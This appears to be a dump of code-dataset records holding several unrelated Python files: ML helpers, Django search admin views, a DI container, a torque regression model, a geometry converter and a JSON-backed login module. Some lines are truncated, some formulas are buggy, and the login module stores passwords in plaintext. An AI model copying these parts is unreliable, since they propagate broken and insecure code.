\n \n import sklearn.metrics as metrics\n # calculate the fpr and tpr for all thresholds of the classification\n probs = classifier.predict_proba(X_test)\n preds = probs[:,1]\n fpr, tpr, threshold = metrics.roc_curve(y_test, preds)\n roc_auc = metrics.auc(fpr, tpr)\n \n# # method I: plt\n# import matplotlib.pyplot as plt\n# plt.title('Receiver Operating Characteristic')\n# plt.plot(fpr, tpr, 'b', label = 'AUC = %0.3f' % roc_auc)\n# plt.legend(loc = 'lower right')\n# plt.plot([0, 1], [0, 1],'r--')\n# plt.xlim([0, 1])\n# plt.ylim([0, 1])\n# plt.ylabel('True Positive Rate')\n# plt.xlabel('False Positive Rate')\n# plt.show()\n \n return {\"accuracy\":accuracies.mean(),\"std\":accuracies.std(),\"AUC\":roc_auc}\n \n#FROM ITERATION 3 \ndef add_gaussian_index(df,index):\n import math\n mean= df.mean()[index]\n std = df.std()[index]\n var = std**2\n denom = var*((2**math.pi)**0.5)\n new = df.iloc[:,index]\n new = new.fillna(0)\n\n new=new.apply(lambda x: ((2.7182**(-((x-mean)**2)/(2*var)))/denom))\n df.iloc[:,index]=new\n return df\n\n\n#FROM ITERATION 4\n \n\"\"\"\nInput : \n takes array of values\nOutput : \n plot the function\n\"\"\"\ndef plot(s):\n count, bins, ignored = plt.hist(s, 30, normed=True)\n plt.show()\n\n\"\"\"\nInput : \n mu - mean\n sigma - standard deviation\n vals - how many values you want in that range\nOutput :\n return normally distributed sample\n\"\"\"\n\ndef gaussiansample(mu,sigma,vals): \n s = np.random.normal(mu, sigma, 1000)\n return s\n\ndef choose_random(lis):\n return random.choice(lis)\n\ndef augment_row_byvalue_single(data,ignore_index,times,std,sample_size,add_initial=False):\n a = data.copy()\n i = 0\n ans=0\n for i in range(len(data.columns)):\n if i>ignore_index:\n if not np.isnan(data.iat[0,i]):\n ans+=1\n temp2 = 0 \n s = gaussiansample(data.iat[0,i],std,sample_size)\n while temp2ignore_index:\n if not np.isnan(data.iat[0,i]):\n ans+=1\n s = gaussiansample(data.iat[0,i],std,sample_size)\n val = choose_random(s)\n temp.iat[0,i]=val\n data=data.append(temp)\n\n print(\"Found {} values in the row and augmented {} values\".format(ans,ans*times))\n #Include the first row i.e. the original data \n if add_initial:\n return data\n else:\n return data.iloc[1:] \n \ndef augment_column_byvalue_single(data,col_index,times,std,sample_size,add_initial=False):\n new = pd.DataFrame()\n if add_initial:\n new = new.append(data,ignore_index=True)\n if not np.isnan(data.iat[0,col_index]):\n s = gaussiansample(data.iat[0,col_index],std,sample_size)\n for i in range(times):\n temp = data.copy()\n val = choose_random(s)\n temp.iat[0,col_index]=val\n new = new.append(temp,ignore_index=True)\n return new \n\n#Return top n indexs based on value\ndef get_top_n(lis,num):\n return sorted(range(len(lis)), key=lambda i: lis[i], reverse=True)[:num]\n\n#Return all the subsets of list except the blank one and itself\ndef subsets(lis):\n from itertools import chain, combinations\n def all_subsets(ss):\n return chain(*map(lambda x: combinations(ss, x), range(0, len(ss)+1)))\n comb = []\n for subset in all_subsets(lis):\n if len(subset)!=0 and len(subset)!=1:\n comb.append(subset)\n return comb\n\n#Takes tuple of string and convert them into list\ndef convertstrtolist(a):\n a=a.replace(\"(\",\"\")\n a=a.replace(\")\",\"\")\n a=a.split(\",\")\n lis=[]\n for i in a:\n lis.append(int(i))\n return lis\n \n\n#DUMPING THE DATA INTO DATA FOLDER\ndef savefile(data,name):\n string = \"data/\"+name\n # open a file, where you ant to store the data\n file = open(string, 'wb')\n # dump information to that file\n pickle.dump(data, file)\n # close the file\n file.close()\n print(\"Success\")\n \ndef loadfile(name):\n string = 'data/'+name\n try:\n # open a file, where you stored the pickled data\n file = open(string, 'rb')\n # dump information to that file\n data = pickle.load(file)\n # close the file\n file.close()\n return data\n except:\n print(\"File not found\")\n\n\n \n","repo_name":"adityavyasbme/UCI_Individual_Research","sub_path":"global_functions.py","file_name":"global_functions.py","file_ext":"py","file_size_in_byte":6802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27699069060","text":"import logging\nfrom datetime import datetime\nfrom difflib import SequenceMatcher\n\nimport requests\n\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.shortcuts import render\n\nfrom kitsune.search import synonym_utils\nfrom kitsune.search.es_utils import (\n get_doctype_stats, get_indexes, delete_index, ES_EXCEPTIONS,\n get_indexable, CHUNK_SIZE, recreate_indexes, write_index, read_index,\n all_read_indexes, all_write_indexes)\nfrom kitsune.search.models import Record, get_mapping_types, Synonym\nfrom kitsune.search.tasks import (\n OUTSTANDING_INDEX_CHUNKS, index_chunk_task, reconcile_task,\n update_synonyms_task)\nfrom kitsune.search.utils import chunked, create_batch_id\nfrom kitsune.sumo.redis_utils import redis_client, RedisError\nfrom kitsune.wiki.models import Document, DocumentMappingType\n\n\nlog = logging.getLogger('k.es')\n\n\ndef handle_reset(request):\n \"\"\"Resets the redis scoreboard we use\n\n Why? The reason you'd want to reset it is if the system gets\n itself into a hosed state where the redis scoreboard says there\n are outstanding tasks, but there aren't. If you enter that state,\n this lets you reset the scoreboard.\n \"\"\"\n try:\n client = redis_client('default')\n client.set(OUTSTANDING_INDEX_CHUNKS, 0)\n except RedisError:\n log.warning('Redis not running. Can not check if there are '\n 'outstanding tasks.')\n return HttpResponseRedirect(request.path)\n\n\nclass DeleteError(Exception):\n pass\n\n\ndef handle_delete(request):\n \"\"\"Deletes an index\"\"\"\n index_to_delete = request.POST.get('delete_index')\n es_indexes = [name for (name, count) in get_indexes()]\n\n # Rule 1: Has to start with the ES_INDEX_PREFIX.\n if not index_to_delete.startswith(settings.ES_INDEX_PREFIX):\n raise DeleteError('\"%s\" is not a valid index name.' % index_to_delete)\n\n # Rule 2: Must be an existing index.\n if index_to_delete not in es_indexes:\n raise DeleteError('\"%s\" does not exist.' % index_to_delete)\n\n # Rule 3: Don't delete the default read index.\n # TODO: When the critical index exists, this should be \"Don't\n # delete the critical read index.\"\n if index_to_delete == read_index('default'):\n raise DeleteError('\"%s\" is the default read index.' % index_to_delete)\n\n # The index is ok to delete\n delete_index(index_to_delete)\n\n return HttpResponseRedirect(request.path)\n\n\nclass ReindexError(Exception):\n pass\n\n\ndef reindex_with_scoreboard(mapping_type_names):\n \"\"\"Reindex all instances of a given mapping type with celery tasks.\n\n This will use Redis to keep track of outstanding tasks so nothing\n gets screwed up by two jobs running at once.\n \"\"\"\n # TODO: If this gets fux0rd, then it's possible this could be\n # non-zero and we really want to just ignore it. Need the ability\n # to ignore it.\n try:\n client = redis_client('default')\n val = client.get(OUTSTANDING_INDEX_CHUNKS)\n if val is not None and int(val) > 0:\n raise ReindexError('There are %s outstanding chunks.' % val)\n\n # We don't know how many chunks we're building, but we do want\n # to make sure another reindex request doesn't slide in here\n # and kick off a bunch of chunks.\n #\n # There is a race condition here.\n client.set(OUTSTANDING_INDEX_CHUNKS, 1)\n except RedisError:\n log.warning('Redis not running. Can not check if there are '\n 'outstanding tasks.')\n\n batch_id = create_batch_id()\n\n # Break up all the things we want to index into chunks. This\n # chunkifies by class then by chunk size. Also generate\n # reconcile_tasks.\n chunks = []\n for cls, indexable in get_indexable(mapping_types=mapping_type_names):\n chunks.extend(\n (cls, chunk) for chunk in chunked(indexable, CHUNK_SIZE))\n\n reconcile_task.delay(cls.get_index(), batch_id,\n cls.get_mapping_type_name())\n\n chunks_count = len(chunks)\n\n try:\n client = redis_client('default')\n client.set(OUTSTANDING_INDEX_CHUNKS, chunks_count)\n except RedisError:\n log.warning('Redis not running. Can\\'t denote outstanding tasks.')\n\n for chunk in chunks:\n index = chunk[0].get_index()\n index_chunk_task.delay(index, batch_id, chunk)\n\n\ndef handle_recreate_index(request):\n \"\"\"Deletes an index, recreates it, and reindexes it.\"\"\"\n groups = [name.replace('check_', '')\n for name in request.POST.keys()\n if name.startswith('check_')]\n\n indexes = [write_index(group) for group in groups]\n recreate_indexes(indexes=indexes)\n\n mapping_types_names = [mt.get_mapping_type_name()\n for mt in get_mapping_types()\n if mt.get_index_group() in groups]\n reindex_with_scoreboard(mapping_types_names)\n\n return HttpResponseRedirect(request.path)\n\n\ndef handle_reindex(request):\n \"\"\"Caculates and kicks off indexing tasks\"\"\"\n mapping_type_names = [name.replace('check_', '')\n for name in request.POST.keys()\n if name.startswith('check_')]\n\n reindex_with_scoreboard(mapping_type_names)\n\n return HttpResponseRedirect(request.path)\n\n\ndef search(request):\n \"\"\"Render the admin view containing search tools\"\"\"\n if not request.user.has_perm('search.reindex'):\n raise PermissionDenied\n\n error_messages = []\n stats = {}\n\n if 'reset' in request.POST:\n try:\n return handle_reset(request)\n except ReindexError as e:\n error_messages.append(u'Error: %s' % e.message)\n\n if 'reindex' in request.POST:\n try:\n return handle_reindex(request)\n except ReindexError as e:\n error_messages.append(u'Error: %s' % e.message)\n\n if 'recreate_index' in request.POST:\n try:\n return handle_recreate_index(request)\n except ReindexError as e:\n error_messages.append(u'Error: %s' % e.message)\n\n if 'delete_index' in request.POST:\n try:\n return handle_delete(request)\n except DeleteError as e:\n error_messages.append(u'Error: %s' % e.message)\n except ES_EXCEPTIONS as e:\n error_messages.append('Error: {0}'.format(repr(e)))\n\n stats = None\n write_stats = None\n es_deets = None\n indexes = []\n outstanding_chunks = None\n\n try:\n # TODO: SUMO has a single ES_URL and that's the ZLB and does\n # the balancing. If that ever changes and we have multiple\n # ES_URLs, then this should get fixed.\n es_deets = requests.get(settings.ES_URLS[0]).json()\n except requests.exceptions.RequestException:\n pass\n\n stats = {}\n for index in all_read_indexes():\n try:\n stats[index] = get_doctype_stats(index)\n except ES_EXCEPTIONS:\n stats[index] = None\n\n write_stats = {}\n for index in all_write_indexes():\n try:\n write_stats[index] = get_doctype_stats(index)\n except ES_EXCEPTIONS:\n write_stats[index] = None\n\n try:\n indexes = get_indexes()\n indexes.sort(key=lambda m: m[0])\n except ES_EXCEPTIONS as e:\n error_messages.append('Error: {0}'.format(repr(e)))\n\n try:\n client = redis_client('default')\n outstanding_chunks = int(client.get(OUTSTANDING_INDEX_CHUNKS))\n except (RedisError, TypeError):\n pass\n\n recent_records = Record.uncached.order_by('-starttime')[:100]\n\n outstanding_records = (Record.uncached.filter(endtime__isnull=True)\n .order_by('-starttime'))\n\n index_groups = set(settings.ES_INDEXES.keys())\n index_groups |= set(settings.ES_WRITE_INDEXES.keys())\n\n index_group_data = [[group, read_index(group), write_index(group)]\n for group in index_groups]\n\n return render(\n request,\n 'admin/search_maintenance.html',\n {'title': 'Search',\n 'es_deets': es_deets,\n 'doctype_stats': stats,\n 'doctype_write_stats': write_stats,\n 'indexes': indexes,\n 'index_groups': index_groups,\n 'index_group_data': index_group_data,\n 'read_indexes': all_read_indexes,\n 'write_indexes': all_write_indexes,\n 'error_messages': error_messages,\n 'recent_records': recent_records,\n 'outstanding_records': outstanding_records,\n 'outstanding_chunks': outstanding_chunks,\n 'now': datetime.now(),\n 'read_index': read_index,\n 'write_index': write_index,\n })\n\n\nadmin.site.register_view('search-maintenance', view=search,\n name='Search - Index Maintenance')\n\n\ndef _fix_results(results):\n \"\"\"Fixes up the S results for better templating\n\n 1. extract the results_dict from the DefaultMappingType\n and returns that as a dict\n 2. turns datestamps into Python datetime objects\n\n Note: This abuses ElasticUtils DefaultMappingType by using\n the private _results_dict.\n\n \"\"\"\n results = [obj._results_dict for obj in results]\n for obj in results:\n # Convert datestamps (which are in seconds since epoch) to\n # Python datetime objects.\n for key in ('indexed_on', 'created', 'updated'):\n if key in obj and not isinstance(obj[key], datetime):\n obj[key] = datetime.fromtimestamp(int(obj[key]))\n return results\n\n\ndef index_view(request):\n requested_bucket = request.GET.get('bucket', '')\n requested_id = request.GET.get('id', '')\n last_20_by_bucket = None\n data = None\n\n bucket_to_model = dict(\n [(cls.get_mapping_type_name(), cls) for cls in get_mapping_types()])\n\n if requested_bucket and requested_id:\n # Nix whitespace because I keep accidentally picking up spaces\n # when I copy and paste.\n requested_id = requested_id.strip()\n\n # The user wants to see a specific item in the index, so we\n # attempt to fetch it from the index and show that\n # specifically.\n if requested_bucket not in bucket_to_model:\n raise Http404\n\n cls = bucket_to_model[requested_bucket]\n data = list(cls.search().filter(id=requested_id))\n if not data:\n raise Http404\n data = _fix_results(data)[0]\n\n else:\n # Create a list of (class, list-of-dicts) showing us the most\n # recently indexed items for each bucket. We only display the\n # id, title and indexed_on fields, so only pull those back from\n # ES.\n last_20_by_bucket = [\n (cls_name,\n _fix_results(cls.search().order_by('-indexed_on')[:20]))\n for cls_name, cls in bucket_to_model.items()]\n\n return render(\n request,\n 'admin/search_index.html',\n {'title': 'Index Browsing',\n 'buckets': [cls_name for cls_name, cls in bucket_to_model.items()],\n 'last_20_by_bucket': last_20_by_bucket,\n 'requested_bucket': requested_bucket,\n 'requested_id': requested_id,\n 'requested_data': data\n })\n\n\nadmin.site.register_view('search-index', view=index_view,\n name='Search - Index Browsing')\n\n\nclass HashableWrapper(object):\n def __init__(self, hashcode, obj):\n self.hashcode = hashcode\n self.obj = obj\n\n def __hash__(self):\n return hash(self.hashcode)\n\n def __eq__(self, obj):\n return self.hashcode == obj.hashcode\n\n def __unicode__(self):\n return repr(self.hashcode)\n\n __str__ = __unicode__\n __repr__ = __unicode__\n\n\ndef diff_it_for_realz(seq_a, seq_b):\n # In order to get a nice diff of the two lists that shows us what\n # has been updated in the db and has not been indexed in an easy\n # to parse way, we hash the items in each list on an (id, date)\n # tuple. That's used to produce the diff.\n #\n # This gets us really close to something that looks good, though\n # it'll probably have problems if it's changed in the db just\n # before midnight and gets indexed just after midnight--the hashes\n # won't match. It's close, though.\n seq_a = [\n HashableWrapper(\n (doc['id'], datetime.date(doc['indexed_on'])), doc)\n for doc in seq_a]\n seq_b = [\n HashableWrapper(\n (doc.id, datetime.date(doc.current_revision.reviewed)), doc)\n for doc in seq_b]\n\n opcodes = SequenceMatcher(None, seq_a, seq_b).get_opcodes()\n results = []\n\n for tag, i1, i2, j1, j2 in opcodes:\n if tag == 'equal':\n for i, j in zip(seq_a[i1:i2], seq_b[j1:j2]):\n results.append((i.obj, j.obj))\n elif tag == 'delete':\n # seq_a is missing things that seq_b has\n for j in seq_b[j1:j2]:\n results.append((None, j.obj))\n elif tag == 'insert':\n # seq_a has things seq_b is missing\n for i in seq_a[i1:i2]:\n results.append((i.obj, None))\n elif tag == 'replace':\n # Sort the items in this section by the datetime stamp.\n section = []\n for i in seq_a[i1:i2]:\n section.append((i.obj['indexed_on'], i.obj, None))\n for j in seq_b[j1:j2]:\n section.append((j.obj.current_revision.reviewed, None, j.obj))\n\n for ignore, i, j in sorted(section, reverse=1):\n results.append((i, j))\n\n return results\n\n\ndef troubleshooting_view(request):\n # Build a list of the most recently indexed 50 wiki documents.\n last_50_indexed = list(_fix_results(DocumentMappingType.search()\n .order_by('-indexed_on')[:50]))\n\n last_50_reviewed = list(Document.uncached\n .filter(current_revision__is_approved=True)\n .order_by('-current_revision__reviewed')[:50])\n\n diff_list = diff_it_for_realz(last_50_indexed, last_50_reviewed)\n\n return render(\n request,\n 'admin/search_troubleshooting.html',\n {'title': 'Index Troubleshooting',\n 'diffs': diff_list,\n })\n\n\nadmin.site.register_view('search-troubleshooting', view=troubleshooting_view,\n name='Search - Index Troubleshooting')\n\n\nclass SynonymAdmin(admin.ModelAdmin):\n list_display = ('id', 'from_words', 'to_words')\n list_display_links = ('id', )\n list_editable = ('from_words', 'to_words')\n ordering = ('from_words', 'id')\n\n\nadmin.site.register(Synonym, SynonymAdmin)\n\n\ndef synonym_editor(request):\n parse_errors = []\n all_synonyms = Synonym.uncached.all()\n\n if 'sync_synonyms' in request.POST:\n # This is a task. Normally we would call tasks asyncronously, right?\n # In this case, since it runs quickly and is in the admin interface,\n # the advantage of it being run in the request/response cycle\n # outweight the delay in responding. If this becomes a problem\n # we should make a better UI and make this .delay() again.\n update_synonyms_task()\n return HttpResponseRedirect(request.path)\n\n synonyms_text = request.POST.get('synonyms_text')\n if synonyms_text is not None:\n db_syns = set((s.from_words, s.to_words) for s in all_synonyms)\n\n try:\n post_syns = set(synonym_utils.parse_synonyms(synonyms_text))\n except synonym_utils.SynonymParseError as e:\n parse_errors = e.errors\n else:\n syns_to_add = post_syns - db_syns\n syns_to_remove = db_syns - post_syns\n\n for (from_words, to_words) in syns_to_remove:\n # This uses .get() because I want it to blow up if\n # there isn't exactly 1 matching synonym.\n (Synonym.uncached.get(from_words=from_words, to_words=to_words)\n .delete())\n\n for (from_words, to_words) in syns_to_add:\n Synonym(from_words=from_words, to_words=to_words).save()\n\n return HttpResponseRedirect(request.path)\n\n # If synonyms_text is not None, it came from POST, and there were\n # errors. It shouldn't be modified, so the error messages make sense.\n if synonyms_text is None:\n synonyms_text = '\\n'.join(unicode(s) for s in all_synonyms)\n\n synonym_add_count, synonym_remove_count = synonym_utils.count_out_of_date()\n\n return render(request, 'admin/search_synonyms.html', {\n 'synonyms_text': synonyms_text,\n 'errors': parse_errors,\n 'synonym_add_count': synonym_add_count,\n 'synonym_remove_count': synonym_remove_count,\n })\n\n\nadmin.site.register_view('synonym_bulk', view=synonym_editor,\n name='Search - Synonym Editor')\n","repo_name":"feer56/Kitsune1","sub_path":"kitsune/search/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":16878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"37784470931","text":"\"\"\"Module containing project's application container.\"\"\"\nimport asyncio\n\nfrom dependency_injector import containers, providers\nfrom tornado.iostream import IOStream\nfrom tornado.tcpclient import TCPClient\n\nfrom src.back.handlers.create_room import CreateRoomHandler\nfrom src.back.handlers.join_room import JoinRoomHandler\nfrom src.back.handlers.ping import PingHandler\nfrom src.back.handlers.routing import RoutingHandler\nfrom src.back.interfaces.values.connection import ConnectionRegistry\nfrom src.back.io import IOConfig, MessagePrefixRegistry, MessageReader, MessageWriter\nfrom src.back.message.create_room import CreateRoomMessage\nfrom src.back.message.join_room import JoinRoomMessage\nfrom src.back.message.ping import PingMessage, PongMessage\nfrom src.back.notifier.notifier import Notification\nfrom src.back.room_registry import RoomRegistry\nfrom src.back.server import Server\nfrom src.cli.client import Client\n\n\nasync def init_client_stream(host: str, port: int) -> IOStream:\n \"\"\"Create stream for the given host/port.\"\"\"\n return await TCPClient().connect(host, port)\n\n\nclass ApplicationContainer(containers.DeclarativeContainer):\n \"\"\"Root container for the project dependencies.\"\"\"\n\n config = providers.Configuration()\n io_config = providers.Factory(\n IOConfig,\n max_message_size=config.MAX_MESSAGE_SIZE,\n message_prefix_size=config.MESSAGE_PREFIX_SIZE,\n message_length_size=config.MESSAGE_LENGTH_SIZE,\n )\n message_prefix_registry = providers.Factory(\n MessagePrefixRegistry,\n providers.Dict(\n {\n 1: PingMessage,\n 2: PongMessage,\n 3: CreateRoomMessage,\n 4: JoinRoomMessage,\n },\n ),\n )\n\n message_reader = providers.Factory(\n MessageReader,\n message_prefix_registry=message_prefix_registry,\n config=io_config,\n )\n message_writer = providers.Factory(\n MessageWriter,\n message_prefix_registry=message_prefix_registry,\n config=io_config,\n )\n\n room_registry = providers.Singleton(RoomRegistry, rooms_lock=asyncio.Lock())\n\n connection_registry = providers.Singleton(\n ConnectionRegistry,\n )\n\n notification = providers.Singleton(\n Notification,\n room_registry=room_registry,\n connection_registry=connection_registry,\n )\n\n ping_handler = providers.Factory(PingHandler, message_writer=message_writer, notifier=notification)\n\n create_room_handler = providers.Factory(\n CreateRoomHandler,\n room_registry=room_registry,\n notifier=notification,\n )\n\n join_room_handler = providers.Factory(\n JoinRoomHandler,\n room_registry=room_registry,\n notifier=notification,\n )\n\n routing_handler = providers.Factory(\n RoutingHandler,\n message_type_to_handlers=providers.Dict(\n {\n PingMessage: providers.List(ping_handler),\n CreateRoomMessage: providers.List(create_room_handler),\n JoinRoomMessage: providers.List(join_room_handler),\n },\n ),\n )\n\n server = providers.Factory(\n Server,\n message_reader=message_reader,\n message_writer=message_writer,\n message_handler=routing_handler,\n connection_registry=connection_registry,\n )\n event = providers.Factory(asyncio.Event)\n\n client_stream = providers.Resource(\n init_client_stream,\n host=config.HOST,\n port=config.PORT,\n )\n client = providers.Singleton(\n Client,\n stream=client_stream,\n message_reader=message_reader,\n message_writer=message_writer,\n )\n","repo_name":"WinterCitizen/roulette","sub_path":"src/back/containers/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26504453512","text":"import numpy as np\nimport scipy as sp\n\n\nclass TorqueModelV1:\n\n def optimize(self, df):\n initial_guess = np.zeros(7 * 2 + 1)\n initial_guess[-1] = 1\n coef = sp.optimize.minimize(self.err, initial_guess, args=(df))\n return [float(x) for x in coef.x]\n\n def err(self, betas, df):\n prediction = self.f(betas, df.iloc[:, df.columns != 'Torque'])\n expected = df['Torque'].to_numpy()\n\n err = (expected - prediction)\n RMSE = np.sqrt(np.mean(np.square(err)))\n\n return RMSE\n\n def calc_r2(self, betas, df):\n ''' Calculate the r squared value between the predicted and measured torque\n\n Args:\n betas (float[]): Coefficients of best fit\n ydata (Data Frame): Measured torque\n xdata (Data Frame): Data from muscles and joint angle\n Returns:\n r2 (float): r-squared measurement of prediction\n RMSE: root mean square error of prediction\n '''\n\n ydata = df['Torque']\n xdata = df.iloc[:, df.columns != 'Torque']\n\n err = (ydata - self.f(betas, xdata)).to_numpy()\n SSR = np.sum(np.square(err))\n norm = (ydata - np.mean(ydata)).to_numpy()\n SSN = np.sum(np.square(norm))\n\n RMSE = np.sqrt(SSR / xdata.iloc[:, 0].size)\n r2 = 1 - (SSR / SSN)\n\n return r2, RMSE\n\n @staticmethod\n def f(betas, X):\n JOINT_ANGLE = X.iloc[:, 0]\n TA = X.iloc[:, 1]\n GM = X.iloc[:, 2]\n SOL = X.iloc[:, 3]\n CONSTANT = np.ones(JOINT_ANGLE.size)\n\n f = (betas[0] * (TA - betas[1])).to_numpy() + (betas[2] * (TA * JOINT_ANGLE - betas[3])).to_numpy() \\\n + (betas[4] * (GM - betas[5])).to_numpy() + (betas[6] * (GM * JOINT_ANGLE - betas[7])).to_numpy() \\\n + (betas[8] * (SOL - betas[9])).to_numpy() + (betas[10] * (SOL * JOINT_ANGLE - betas[11])).to_numpy() \\\n + (betas[12] * (JOINT_ANGLE - betas[13])).to_numpy() \\\n + (betas[14] * CONSTANT)\n\n return f\n","repo_name":"daviddorf2023/mobile_hdemg_exo","sub_path":"mobile_hdemg_exo/src/mobile_hdemg_exo/model/torque_model_v1.py","file_name":"torque_model_v1.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1014879693","text":"# n=[0,9,5]\n# i=0\n# while i)]\n","repo_name":"jedi007/TestPyTorch","sub_path":"easyYoLoV7/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"13963315895","text":"from dataclasses import dataclass, field\nfrom abc import ABC\n\n\n@dataclass(frozen=False)\nclass SolidFigure(ABC):\n \"\"\"\n Abstract solid figure in 3D space. It is characterised by position in\n space and rotation along X,Y,Z axis in its own reference frame. Size of\n the figure (its extend in space) is defined in its subclasses.\n \"\"\"\n\n uuid: str = \"AAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA\"\n name: str = \"\"\n\n position: tuple[float, float, float] = field(default_factory=lambda: (0., 0., 0.))\n rotation: tuple[float, float, float] = field(default_factory=lambda: (0., 0., 0.))\n\n def expand(self, margin: float) -> None:\n \"\"\"Expand figure by `expansion` in each dimension.\"\"\"\n\n\n@dataclass(frozen=False)\nclass SphereFigure(SolidFigure):\n \"\"\"A sphere. Its size is defined by its radius.\"\"\"\n\n radius: float = 1.\n\n def expand(self, margin: float) -> None:\n \"\"\"Expand figure by `margin` in each dimension. Increases figure radius by adding to it a `margin`\"\"\"\n self.radius += margin\n\n\n@dataclass(frozen=False)\nclass CylinderFigure(SolidFigure):\n \"\"\"\n A cylinder, a cone or a truncated cone. It's defined by the radii of both of\n its bases(top and bottom) and height. A cone can be created by setting one\n of the radii to zero.\n \"\"\"\n\n radius_top: float = 1.\n radius_bottom: float = 1.\n height: float = 1.\n\n def expand(self, margin: float) -> None:\n \"\"\"\n Expand the figure by `margin` in each dimension.\n Increases figures height by 2 * `margin` (to achieve the same expansion by 1 * `margin` on the\n bottom and top side.\n Increase as well bottom and top radius by 1 * `margin`.\n \"\"\"\n self.radius_top += margin\n self.radius_bottom += margin\n self.height += margin * 2\n\n\n@dataclass(frozen=False)\nclass BoxFigure(SolidFigure):\n \"\"\"\n A rectangular box (cuboid). The figure can be rotated (meaning its walls don't have\n to be aligned with the axes of the coordinate system). The edge lengths are the final lengths of\n each edge, not the distance from the center of the figure (meaning they are full-size not half-size,\n for example: the edge lengths 1, 1, 1 will result in a 1 by 1 by 1 cube).\n \"\"\"\n\n x_edge_length: float = 1.\n y_edge_length: float = 1.\n z_edge_length: float = 1.\n\n def expand(self, margin: float) -> None:\n \"\"\"\n Expand the figure by `margin` in each dimension.\n Increases figures weight, depth and height by 2 * `margin` to achieve the same\n expansion (1 * `margin`) on each side.\n \"\"\"\n self.x_edge_length += margin * 2\n self.y_edge_length += margin * 2\n self.z_edge_length += margin * 2\n\n\ndef parse_figure(figure_dict: dict) -> SolidFigure:\n \"\"\"Parse json containing information about figure to figure.\"\"\"\n geometry_type = figure_dict['geometryData'].get('geometryType')\n if geometry_type in (\"CyliderGeometry\", \"HollowCylinderGeometry\"):\n return CylinderFigure(\n uuid=figure_dict[\"uuid\"],\n name=figure_dict[\"name\"],\n position=tuple(figure_dict[\"geometryData\"][\"position\"]),\n rotation=tuple(figure_dict[\"geometryData\"][\"rotation\"]),\n radius_top=figure_dict[\"geometryData\"]['parameters'][\"radius\"],\n radius_bottom=figure_dict[\"geometryData\"]['parameters'][\"radius\"],\n height=figure_dict[\"geometryData\"]['parameters'][\"depth\"],\n )\n if geometry_type == \"BoxGeometry\":\n return BoxFigure(\n uuid=figure_dict[\"uuid\"],\n name=figure_dict[\"name\"],\n position=tuple(figure_dict[\"geometryData\"][\"position\"]),\n rotation=tuple(figure_dict[\"geometryData\"][\"rotation\"]),\n y_edge_length=figure_dict[\"geometryData\"]['parameters'][\"height\"],\n x_edge_length=figure_dict[\"geometryData\"]['parameters'][\"width\"],\n z_edge_length=figure_dict[\"geometryData\"]['parameters'][\"depth\"],\n )\n if geometry_type == \"SphereGeometry\":\n return SphereFigure(\n uuid=figure_dict[\"uuid\"],\n name=figure_dict[\"name\"],\n position=tuple(figure_dict[\"geometryData\"][\"position\"]),\n rotation=tuple(figure_dict[\"geometryData\"][\"rotation\"]),\n radius=figure_dict[\"geometryData\"]['parameters'][\"radius\"],\n )\n print(f\"Invalid geometry of type \\\"{geometry_type}\\\" in figure \\\"{figure_dict.get('name')}\\\".\")\n raise ValueError(\n \"Geometry type must be either 'HollowCylinderGeometry', 'CylinderGeometry', 'BoxGeometry', or 'SphereGeometry'\")\n","repo_name":"yaptide/converter","sub_path":"converter/solid_figures.py","file_name":"solid_figures.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"13958046032","text":"import json\nimport string\nimport random\nfrom json import JSONDecodeError\n\ndef Register(type,member_json_file,admin_json_file,Full_Name,Address,Email,Password):\n '''Register Function || Return True if registered successfully else False'''\n if type.lower()=='admin':\n f=open(admin_json_file,'r+')\n d={\n \"Full Name\":Full_Name,\n \"Address\":Address,\n \"Email\":Email,\n \"Password\":Password,\n }\n try:\n content=json.load(f)\n if d not in content:\n content.append(d)\n f.seek(0)\n f.truncate()\n json.dump(content,f)\n except JSONDecodeError:\n l=[]\n l.append(d)\n json.dump(l,f)\n f.close()\n return True\n elif type.lower()=='member':\n f=open(member_json_file,'r+')\n d={\n \"Full Name\":Full_Name,\n \"Address\":Address,\n \"Email\":Email,\n \"Password\":Password,\n }\n try:\n content=json.load(f)\n if d not in content:\n content.append(d)\n f.seek(0)\n f.truncate()\n json.dump(content,f)\n except JSONDecodeError:\n l=[]\n l.append(d)\n json.dump(l,f)\n f.close()\n return True\n else:\n return False\n\ndef Login(type,members_json_file,admin_json_file,Email,Password):\n '''Login Functionality || Return True if successfully logged in else False'''\n d=0\n if type.lower()=='admin':\n f=open(admin_json_file,'r+')\n else:\n f=open(members_json_file,'r+')\n try:\n content=json.load(f)\n except JSONDecodeError:\n return False\n for i in range(len(content)):\n if content[i][\"Email\"]==Email and content[i][\"Password\"]==Password:\n d=1\n break\n f.seek(0)\n f.truncate()\n json.dump(content,f)\n f.close()\n if d==0:\n return False\n return True\n\ndef AutoGenerate_ProductID():\n '''Return a autogenerated random product ID'''\n product_ID=''.join(random.choices(string.ascii_uppercase+string.digits,k=4))\n return product_ID\n\ndef AutoGenerate_OrderID():\n '''Return a autogenerated random product ID'''\n Order_ID=''.join(random.choices(string.ascii_uppercase+string.digits,k=3))\n return Order_ID\n\ndef Create_Product(owner,product_json_file,product_ID,product_name,manufacturer_name,price,discount,total_stock_available):\n '''Creating a product || Return True if successfully created else False'''\n product_data = {\n 'owner': owner,\n 'product_ID': product_ID,\n 'product_name': product_name,\n 'manufacturer_name': manufacturer_name,\n 'price': price,\n 'discount': discount,\n 'total_stock_available': total_stock_available\n }\n \n with open(product_json_file, 'r+') as f:\n product_json_data = json.load(f)\n \n if product_ID in product_json_data:\n print('Product with ID {} already exists!'.format(product_ID))\n return False\n 